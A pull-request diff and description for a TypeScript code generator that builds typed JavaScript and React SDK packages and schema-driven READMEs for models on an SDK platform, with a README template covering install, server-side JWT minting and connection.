+ * Fields to show populated in a code example. Strictly-required fields
+ * always appear; if none are required we pick one illustrative field so
+ * the snippet reads as `setPrompt({ prompt: "…" })` rather than a
+ * useless `setPrompt({})`.
+ */
+function exampleFields(event: EventSchema): [string, FieldSchema][] {
+  const entries = Object.entries(event.fields);
+  const required = strictlyRequiredFields(event);
+  if (required.length > 0) return required;
+  const firstNonUpload = entries.find(([, f]) => !isUploadReference(f));
+  return firstNonUpload ? [firstNonUpload] : [];
+}
+
+function readmeEventJsSnippet(
+  event: EventSchema,
+  modelName: string,
+  modelPrefix: string,
+  packageName: string,
+): string {
+  const method = toCamelCase(event.name);
+  const hasFields = Object.keys(event.fields).length > 0;
+  const example = exampleFields(event);
+
+  const lines: string[] = [];
+  lines.push(
+    `import { ${modelPrefix}Model } from ${JSON.stringify(packageName)};`,
+  );
+  lines.push("");
+  lines.push(`const ${modelName} = new ${modelPrefix}Model();`);
+  lines.push(`await ${modelName}.connect(jwt);`);
+  lines.push("");
+
+  if (hasUploadRefParam(event)) {
+    const uploadField = Object.entries(event.fields).find(([, f]) =>
+      isUploadReference(f),
+    )!;
+    const additionalRequired = strictlyRequiredFields(event).filter(
+      ([name, f]) => name !== uploadField[0] && !isUploadReference(f),
+    );
+    lines.push(`const fileRef = await ${modelName}.uploadFile(blob);`);
+    const argParts = [`${uploadField[0]}: fileRef`].concat(
+      additionalRequired.map(
+        ([name, f]) => `${name}: ${sampleValueJs(f, name)}`,
+      ),
+    );
+    lines.push(`await ${modelName}.${method}({ ${argParts.join(", ")} });`);
+  } else if (!hasFields || example.length === 0) {
+    lines.push(`await ${modelName}.${method}(${hasFields ? "{}" : ""});`);
+  } else {
+    const argParts = example.map(
+      ([name, f]) => `${name}: ${sampleValueJs(f, name)}`,
+    );
+    lines.push(`await ${modelName}.${method}({ ${argParts.join(", ")} });`);
+  }
+
+  return lines.join("\n");
+}
+
+function readmeEventReactSnippet(
+  event: EventSchema,
+  modelPrefix: string,
+  packageName: string,
+): string {
+  const method = toCamelCase(event.name);
+  const hasFields = Object.keys(event.fields).length > 0;
+  const example = exampleFields(event);
+  const destructured = hasUploadRefParam(event)
+    ? `{ ${method}, uploadFile }`
+    : `{ ${method} }`;
+
+  const lines: string[] = [];
+  lines.push(`"use client";`);
+  lines.push(`import { use${modelPrefix} } from "${packageName}";`);
+  lines.push("");
+  lines.push(`function Example() {`);
+  lines.push(`  const ${destructured} = use${modelPrefix}();`);
+  if (hasUploadRefParam(event)) {
+    const uploadField = Object.entries(event.fields).find(([, f]) =>
+      isUploadReference(f),
+    )!;
+    const additionalRequired = strictlyRequiredFields(event).filter(
+      ([name, f]) => name !== uploadField[0] && !isUploadReference(f),
+    );
+    lines.push("");
+    lines.push(`  async function handlePick(file: File) {`);
+    lines.push(`    const ref = await uploadFile(file);`);
+    const argParts = [`${uploadField[0]}: ref`].concat(
+      additionalRequired.map(
+        ([name, f]) => `${name}: ${sampleValueJs(f, name)}`,
+      ),
+    );
+    lines.push(`    await ${method}({ ${argParts.join(", ")} });`);
+    lines.push(`  }`);
+    lines.push("");
+    lines.push(
+      `  return <input type="file" onChange={(e) => handlePick(e.target.files![0])} />;`,
+    );
+  } else if (!hasFields || example.length === 0) {
+    lines.push("");
+    lines.push(
+      `  return <button onClick={() => ${method}(${hasFields ? "{}" : ""})}>${method}</button>;`,
+    );
+  } else {
+    const argParts = example.map(
+      ([name, f]) => `${name}: ${sampleValueJs(f, name)}`,
+    );
+    lines.push("");
+    lines.push(
+      `  return <button onClick={() => ${method}({ ${argParts.join(", ")} })}>${method}</button>;`,
+    );
+  }
+  lines.push(`}`);
+  return lines.join("\n");
+}
+
+function formatLogStatement(
+  messageName: string,
+  fieldNames: string[],
+  indent: string,
+): string {
+  const args = [
+    JSON.stringify(messageName),
+    ...fieldNames.map((f) => `msg.${f}`),
+  ];
+  if (args.length <= 3) return `console.log(${args.join(", ")});`;
+  const inner = args.map((a) => `${indent}  ${a},`).join("\n");
+  return `console.log(\n${inner}\n${indent});`;
+}
+
+function readmeMessageJsSnippet(
+  message: MessageSchema,
+  modelName: string,
+  modelPrefix: string,
+  packageName: string,
+): string {
+  const listener = `on${toPascalCase(message.name)}`;
+  const fieldNames = Object.keys(message.fields);
+  const hasFields = fieldNames.length > 0;
+
+  const body = hasFields
+    ? [
+        `${modelName}.${listener}((msg) => {`,
+        `  ${formatLogStatement(message.name, fieldNames, "  ")}`,
+        `});`,
+      ]
+    : [
+        `${modelName}.${listener}(() => {`,
+        `  console.log(${JSON.stringify(message.name)});`,
+        `});`,
+      ];
+
+  return [
+    `import { ${modelPrefix}Model } from ${JSON.stringify(packageName)};`,
+    "",
+    `const ${modelName} = new ${modelPrefix}Model();`,
+    ...body,
+    `await ${modelName}.connect(jwt);`,
+  ].join("\n");
+}
+
+function readmeMessageReactSnippet(
+  message: MessageSchema,
+  modelPrefix: string,
+  packageName: string,
+): string {
+  const hook = `use${modelPrefix}${toPascalCase(message.name)}`;
+  const fieldNames = Object.keys(message.fields);
+  const hasFields = fieldNames.length > 0;
+
+  const body = hasFields
+    ? [
+        `${hook}((msg) => {`,
+        `  ${formatLogStatement(message.name, fieldNames, "  ")}`,
+        `});`,
+      ]
+    : [
+        `${hook}(() => {`,
+        `  console.log(${JSON.stringify(message.name)});`,
+        `});`,
+      ];
+
+  return [
+    `import { ${hook} } from "${packageName}";`,
+    "",
+    `// Inside a React component wrapped by <${modelPrefix}Provider>:`,
+    ...body,
+  ].join("\n");
+}
+
+// ---------------------------------------------------------------------------
+// Section emitters
+// ---------------------------------------------------------------------------
+
+/**
+ * Extract backticked tokens from a description and filter to known
+ * messages — used to render "Emits: …" lines under events. GitHub's
+ * auto-anchor rules lowercase headings, so we build the anchor map once
+ * up front (it's also the set used by field-description cross-links).
+ */
+function extractEmittedMessageRefs(
+  text: string,
+  knownMessages: Set<string>,
+): string[] {
+  if (!text) return [];
+  const out = new Set<string>();
+  const re = /`([a-zA-Z_][a-zA-Z0-9_]*)`/g;
+  let m: RegExpExecArray | null;
+  while ((m = re.exec(text)) !== null) {
+    if (knownMessages.has(m[1])) out.add(m[1]);
+  }
+  return Array.from(out);
+}
+
+function generateReadmeEventSection(
+  event: EventSchema,
+  modelName: string,
+  modelPrefix: string,
+  packageName: string,
+  anchors: Record<string, string>,
+  knownMessages: Set<string>,
+): string {
+  const method = toCamelCase(event.name);
+  const emits = extractEmittedMessageRefs(event.description, knownMessages);
+
+  const out: string[] = [];
+  out.push(`### \`${method}\``);
+  out.push("");
+  if (event.description) {
+    out.push(mdBacktickedCrossLinks(event.description, anchors));
+    out.push("");
+  }
+  if (emits.length > 0) {
+    const links = emits
+      .map((name) => `[\`${name}\`](${anchors[name]})`)
+      .join(", ");
+    out.push(`Emits: ${links}`);
+    out.push("");
+  }
+  out.push(mdFieldTable(Object.entries(event.fields), "param", anchors));
+  out.push("#### JavaScript");
+  out.push("");
+  out.push("```typescript");
+  out.push(readmeEventJsSnippet(event, modelName, modelPrefix, packageName));
+  out.push("```");
+  out.push("");
+  out.push("#### React");
+  out.push("");
+  out.push("```tsx");
+  out.push(readmeEventReactSnippet(event, modelPrefix, packageName));
+  out.push("```");
+  out.push("");
+  return out.join("\n");
+}
+
+function generateReadmeMessageSection(
+  message: MessageSchema,
+  modelName: string,
+  modelPrefix: string,
+  packageName: string,
+  anchors: Record<string, string>,
+): string {
+  const listener = `on${toPascalCase(message.name)}`;
+  const hook = `use${modelPrefix}${toPascalCase(message.name)}`;
+
+  const out: string[] = [];
+  out.push(`### \`${message.name}\``);
+  out.push("");
+  if (message.description) {
+    out.push(mdBacktickedCrossLinks(message.description, anchors));
+    out.push("");
+  }
+  out.push(`Listener: \`${listener}\` · React hook: \`${hook}\``);
+  out.push("");
+  out.push(mdFieldTable(Object.entries(message.fields), "field", anchors));
+  out.push("#### JavaScript");
+  out.push("");
+  out.push("```typescript");
+  out.push(
+    readmeMessageJsSnippet(message, modelName, modelPrefix, packageName),
+  );
+  out.push("```");
+  out.push("");
+  out.push("#### React");
+  out.push("");
+  out.push("```tsx");
+  out.push(readmeMessageReactSnippet(message, modelPrefix, packageName));
+  out.push("```");
+  out.push("");
+  return out.join("\n");
+}
+
+function generateReadmeTracksSection(tracks: TrackSchema[]): string {
+  if (tracks.length === 0) return "";
+  const out: string[] = [];
+  out.push(
+    "The generated package pre-wires these as `modelTracks` so the SDK prepares the WebRTC offer in parallel with session setup — no client wiring required.",
+  );
+  out.push("");
+  out.push("| Name | Kind | Direction | Transport |");
+  out.push("|---|---|---|---|");
+  for (const t of tracks) {
+    // Schema direction is from the model's perspective; the transport
+    // (client) direction is the mirror image. Kept inline here so the
+    // README emitter doesn't take a dep on the track-constant rewrite
+    // that lands in a later PR.
+    const transport = t.direction === "in" ? "sendonly" : "recvonly";
+    out.push(
+      `| \`${t.name}\` | ${t.kind} | ${t.direction} | \`${transport}\` |`,
+    );
+  }
+  out.push("");
+  return out.join("\n");
+}
+
+/**
+ * Build the anchor map used by cross-links in event/message descriptions.
+ *
+ * Anchors follow GitHub's auto-generated rules (lowercase, spaces →
+ * dashes, non-alphanumerics stripped). Event headings are the camelCase
+ * method name (`setPrompt`); message headings are the raw snake_case
+ * name (`prompt_accepted`). Both cases collapse cleanly to a single
+ * anchor segment under that rule.
+ */
+function buildReadmeAnchors(
+  events: EventSchema[],
+  messages: MessageSchema[],
+): Record<string, string> {
+  const anchors: Record<string, string> = {};
+  for (const e of events) {
+    anchors[e.name] = `#${toCamelCase(e.name).toLowerCase()}`;
+  }
+  for (const m of messages) {
+    anchors[m.name] = `#${m.name.toLowerCase()}`;
+  }
+  return anchors;
+}
+
+// ---------------------------------------------------------------------------
+// Exported top-level assembler
+// ---------------------------------------------------------------------------
+
+export function generateReadme(options: CodegenOptions): string {
+  const { schema } = options;
+  const modelName = schema.modelName;
+  const modelPrefix = toPascalCase(modelName);
+  const packageName = `@reactor-models/${modelName}`;
+
+  const template = loadReadmeTemplate();
+  const rendered = renderTemplate(template, {
+    MODEL_NAME: modelName,
+    MODEL_PREFIX: modelPrefix,
+    MODEL_VERSION: formatVersionForHeader(schema.modelVersion),
+    PACKAGE_NAME: packageName,
+  });
+
+  const knownMessages = new Set(schema.messages.map((m) => m.name));
+  const anchors = buildReadmeAnchors(schema.events, schema.messages);
+
+  const sections: string[] = [rendered.trimEnd(), ""];
+
+  if (schema.events.length > 0) {
+    sections.push("## Events");
+    sections.push("");
+    sections.push(
+      `Client-to-model commands. The typed surface is \`${modelPrefix}Model\` (one method per event) in plain JS, and \`use${modelPrefix}()\` in React — every field name below matches the parameter name the method accepts.`,
+    );
+    sections.push("");
+    for (const event of schema.events) {
+      sections.push(
+        generateReadmeEventSection(
+          event,
+          modelName,
+          modelPrefix,
+          packageName,
+          anchors,
+          knownMessages,
+        ),
+      );
+    }
+  }
+
+  if (schema.messages.length > 0) {
+    sections.push("## Messages");
+    sections.push("");
+    sections.push(
+      `Model-to-client messages. Register a typed listener with \`on…\` on \`${modelPrefix}Model\`, or a \`use${modelPrefix}…\` hook in React, to receive only the messages you care about.`,
+    );
+    sections.push("");
+    for (const message of schema.messages) {
+      sections.push(
+        generateReadmeMessageSection(
+          message,
+          modelName,
+          modelPrefix,
+          packageName,
+          anchors,
+        ),
+      );
+    }
+  }
+
+  if (schema.tracks.length > 0) {
+    sections.push("## Tracks");
+    sections.push("");
+    sections.push(generateReadmeTracksSection(schema.tracks));
+  }
+
+  // Trailing blank line keeps the final file POSIX-compliant and avoids
+  // the "no newline at end of file" warning in `git diff`.
+  return sections.join("\n").trimEnd() + "\n";
+}
+
+// Re-export internal helpers for targeted unit testing.
+// Public consumers should only use `generateReadme`.
+export const __testing__ = {
+  renderTemplate,
+};

--- a/packages/codegen/src/types.ts
+++ b/packages/codegen/src/types.ts
@@ -53,6 +53,22 @@ export interface CodegenOptions {
   sdkVersion: string;
   schema: ModelSchema;
   outputDir: string;
+  /**
+   * When `true`, emit `src/react.ts` alongside `src/index.ts` with a
+   * provider, a typed command hook, and one typed listener hook per
+   * model message. `src/index.ts` re-exports everything from
+   * `src/react.ts`, so consumers can `import { <Prefix>Provider,
+   * use<Prefix> } from "@reactor-models/<name>"` — the split is a
+   * source-layout concern only and the package exposes a single public
+   * entry. The generated `package.json` grows a `react` peer
+   * dependency and `src/index.ts` gains a top-level `"use client";`
+   * directive so the bundled output is correctly marked as a
+   * client-only module in React Server Components.
+   *
+   * When `false` (default), the output is framework-agnostic — no
+   * React imports appear in the generated package.
+   */
+  react?: boolean;
 }
 
 export interface GeneratedFile {

--- a/packages/codegen/templates/readme.md
+++ b/packages/codegen/templates/readme.md
@@ -1,0 +1,128 @@
+# @reactor-models/{{MODEL_NAME}}
+
+> Typed JavaScript + React SDK for the **{{MODEL_PREFIX}}** model on [Reactor](https://reactor.inc). Version **{{MODEL_VERSION}}**.
+
+---
+
+## Install
+
+```shell
+npm install @reactor-models/{{MODEL_NAME}}
+```
+
+```shell
+pnpm add @reactor-models/{{MODEL_NAME}}
+```
+
+The package exports a plain-JavaScript client and a set of React bindings. Import whichever you need from `@reactor-models/{{MODEL_NAME}}`:
+
+```typescript
+import { {{MODEL_PREFIX}}Model } from "@reactor-models/{{MODEL_NAME}}";
+```
+
+```typescript
+import { {{MODEL_PREFIX}}Provider, use{{MODEL_PREFIX}} } from "@reactor-models/{{MODEL_NAME}}";
+```
+
+React 18 or later is required when using the provider and hooks.
+
+---
+
+## Authenticate
+
+Reactor uses short-lived JWTs for session auth. You hold your API key on your server, mint a token on demand, and the client never sees the raw key. Tokens are valid for **6 hours** — if one leaks, it expires on its own.
+
+Mint a JWT with **`POST https://api.reactor.inc/tokens`** and the **`Reactor-API-Key`** header; the response JSON is `{ "jwt": "..." }`.
+
+### JavaScript (Next.js route handler)
+
+```typescript
+// app/api/reactor/token/route.ts
+import { NextResponse } from "next/server";
+
+export async function POST() {
+  const res = await fetch("https://api.reactor.inc/tokens", {
+    method: "POST",
+    headers: { "Reactor-API-Key": process.env.REACTOR_API_KEY! },
+  });
+  const { jwt } = await res.json();
+  return NextResponse.json({ jwt });
+}
+```
+
+### React (provider)
+
+Call the `/api/reactor/token` route above from a client component and pass the result to the provider:
+
+```tsx
+"use client";
+import { useEffect, useState } from "react";
+import { {{MODEL_PREFIX}}Provider } from "@reactor-models/{{MODEL_NAME}}";
+import { ReactorView } from "@reactor-team/js-sdk";
+
+export default function App() {
+  const [jwt, setJwt] = useState<string | null>(null);
+
+  useEffect(() => {
+    fetch("/api/reactor/token", { method: "POST" })
+      .then((r) => r.json())
+      .then((d) => setJwt(d.jwt));
+  }, []);
+
+  if (!jwt) return null;
+
+  return (
+    <{{MODEL_PREFIX}}Provider jwtToken={jwt} connectOptions={{ autoConnect: true }}>
+      <ReactorView className="w-full aspect-video" />
+    </{{MODEL_PREFIX}}Provider>
+  );
+}
+```
+
+---
+
+## Connect
+
+### JavaScript
+
+```typescript
+import { {{MODEL_PREFIX}}Model } from "@reactor-models/{{MODEL_NAME}}";
+
+const {{MODEL_NAME}} = new {{MODEL_PREFIX}}Model();
+await {{MODEL_NAME}}.connect(jwt);
+```
+
+### React
+
+The provider takes the JWT as a prop; fetch it from the same `/api/reactor/token` route the Authenticate example mints.
+
+```tsx
+"use client";
+import { useEffect, useState } from "react";
+import { {{MODEL_PREFIX}}Provider, use{{MODEL_PREFIX}} } from "@reactor-models/{{MODEL_NAME}}";
+
+function Controller() {
+  const { status } = use{{MODEL_PREFIX}}();
+  return <span>Status: {status}</span>;
+}
+
+export default function App() {
+  const [jwt, setJwt] = useState<string | null>(null);
+
+  useEffect(() => {
+    fetch("/api/reactor/token", { method: "POST" })
+      .then((r) => r.json())
+      .then((d) => setJwt(d.jwt));
+  }, []);
+
+  if (!jwt) return null;
+
+  return (
+    <{{MODEL_PREFIX}}Provider jwtToken={jwt}>
+      <Controller />
+    </{{MODEL_PREFIX}}Provider>
+  );
+}
+```
+
+---


### PR DESCRIPTION
## Why

Turn a parsed `ModelSchema` into a full `@reactor-models/<name>` npm package — source, scaffolding, and README — deterministically. This is the codegen's core transform; everything that follows (CLI in PR 4, coordinator fetch in PR 5, CI in PR 6) is plumbing around this.

## What changed

**TypeScript emission (`src/emitter.ts`)**

- Per-event `<Prefix><Event>Params` interfaces with JSDoc (`@default`, `@minimum`/`@maximum`, `@minLength`/`@maxLength`, free-form descriptions).
- Per-message interfaces + `<Prefix>Message` discriminated union; per-message `on<Name>()` listener helpers.
- `<Prefix>Model` client class wrapping `Reactor`; typed `sendCommand` per event; conditional `uploadFile()` + `FileRef` import when any event references `reactor-upload-reference`.
- `<Prefix>Tracks` constant (transport-direction translation lands in PR 4).
- Optional React entry point (`src/react.ts`): `<Prefix>Provider`, `use<Prefix>()`, one `use<Prefix><Msg>` hook per message. Uses `React.createElement` so the file stays `.ts`, not `.tsx`.
- Deterministic: same input → byte-identical output.

**Version helpers (emit-time normalisation)**

| Helper | Drops `-g<sha>` | Drops leading `v` | Used for |
|---|---|---|---|
| `stripBuildMetadata` | ✓ | — | primitive shared by the others |
| `formatVersionForHeader` | ✓ | ensures single `v` | `// Model: <name> v<version>` banner |
| `formatVersionForPackageJson` | ✓ | ✓ (npm strict semver) | `package.json` `version` field (→ tarball name) |
| `formatVersionForModelConstant` | ✓ | preserves author's `v` | exported `MODEL_VERSION` const |

The `-g<sha>` strip uses a narrow regex (`/-g[0-9a-f]+$/i`) so legit semver pre-releases like `-beta.3` or `-rc.1` pass through untouched.

**Schema-driven README (`src/readme-emitter.ts` + `templates/readme.md`)**

- Static boilerplate (install, authenticate via `POST /tokens`, connect quick-start) rendered from a committed template with `{{MODEL_NAME}}` / `{{MODEL_PREFIX}}` / `{{MODEL_VERSION}}` / `{{PACKAGE_NAME}}` placeholders.
- Dynamic sections appended per schema: one subsection per event with a Parameter table + JS + React snippets, one per message with a Field table + listener / hook snippets, plus a tracks table with schema → transport direction mapping.
- Backticked identifiers in descriptions become markdown cross-links (`` `prompt_accepted` `` → `[...](#prompt_accepted)`).
- Pipes inside enum union types are backslash-escaped so GFM tables don't collapse on rows like `` `"off" \| "2x" \| "4x"` ``.
- Structure mirrors `reactor-webapp/lib/model-api-doc.ts` so READMEs and in-app docs stay in lockstep.

**Injection defence (belt + suspenders with PR 2's ingress validation)**

- Every user-controlled string routed through `JSON.stringify` (`MODEL_NAME`, `MODEL_VERSION`, enum values, discriminators, `sendCommand("...", …)`).
- `sanitizeJsDocLine` escapes `*/` → `*\/` and collapses `\r\n` / `U+2028` / `U+2029` so a description can't terminate a JSDoc block and land as real code below.

**Package scaffolding**

- `package.json` — dual ESM + CJS; conditional `./react` subpath export + `react` peer dep when `--react` is set.
- `tsup.config.ts` — single entry normally, dual entry with `--react`.
- `tsconfig.json`.

**Library facade (`src/codegen.ts`)** — `generateModelSdk(options) → GeneratedPackage`, `writePackage(pkg, outputDir)`.

## Shape of the change

```
packages/codegen/
├── src/
│   ├── emitter.ts               (TS emission + version helpers + scaffold)
│   ├── readme-emitter.ts        (schema-driven README)
│   ├── codegen.ts               (library facade)
│   ├── types.ts                 (+ CodegenOptions.react)
│   └── index.ts                 (+ generateModelSdk, writePackage exports)
├── templates/
│   └── readme.md                (committed template)
└── __tests__/
    ├── emitter.test.ts          (66 tests)
    └── readme-emitter.test.ts   (11 tests)
```

## Usage (library)

```ts
import { loadSchema, parseSchema, generateModelSdk, writePackage } from "@reactor-team/codegen";

const schema = parseSchema(loadSchema("schema.json"));
const pkg = generateModelSdk({
  modelName: schema.modelName,
  modelVersion: schema.modelVersion,  // `v0.8.3-g404f6950` is fine — normalised at emit
  sdkVersion: "2.9.1",
  schema,
  outputDir: "./out/helios",
  react: true,                        // optional: emit src/react.ts + subpath export
});
writePackage(pkg, "./out/helios");
```

## Tests

103 total (66 emitter + 11 readme-emitter + 26 parser inherited). Covers case helpers, type mapping, upload-ref detection, every generator, React emission, `stripBuildMetadata` + all three version formatters, injection defence (`sanitizeJsDocLine`, hostile IR built by bypassing the parser), determinism, README placeholder substitution, cross-linking, pipe-escape in GFM tables, and an end-to-end regression that feeds `v0.8.3-g404f6950` and asserts every emitted surface (header, `MODEL_VERSION`, `package.json.version`, README callout) normalises to `v0.8.3` / `0.8.3` with no SHA leaking anywhere.

## Notes for reviewers

- Python snippets in READMEs are out of scope — we don't currently ship a typed Python generated client, so copying the webapp's Python samples here would mislead.
- Template owns install / auth / connect wording; schema-driven renderer owns Events / Messages / Tracks. If the webapp's snippet rules change, update this emitter in the same commit.

## Stack

1. [`[1/6]`](https://app.graphite.com/github/pr/reactor-team/js-sdk/117) scaffold + IR
2. [`[2/6]`](https://app.graphite.com/github/pr/reactor-team/js-sdk/118) parser + ingress validation
3. **→ this PR** emitter + README + injection defence + version helpers
4. [`[4/6]`](https://app.graphite.com/github/pr/reactor-team/js-sdk/120) CLI + modelTracks + defaultSdkVersion
5. [`[5/6]`](https://app.graphite.com/github/pr/reactor-team/js-sdk/121) coordinator fetch + auth exchange
6. [`[6/6]`](https://app.graphite.com/github/pr/reactor-team/js-sdk/122) Buildkite publish pipeline

Ref: [REA-1581](https://linear.app/reactor-team/issue/REA-1581)
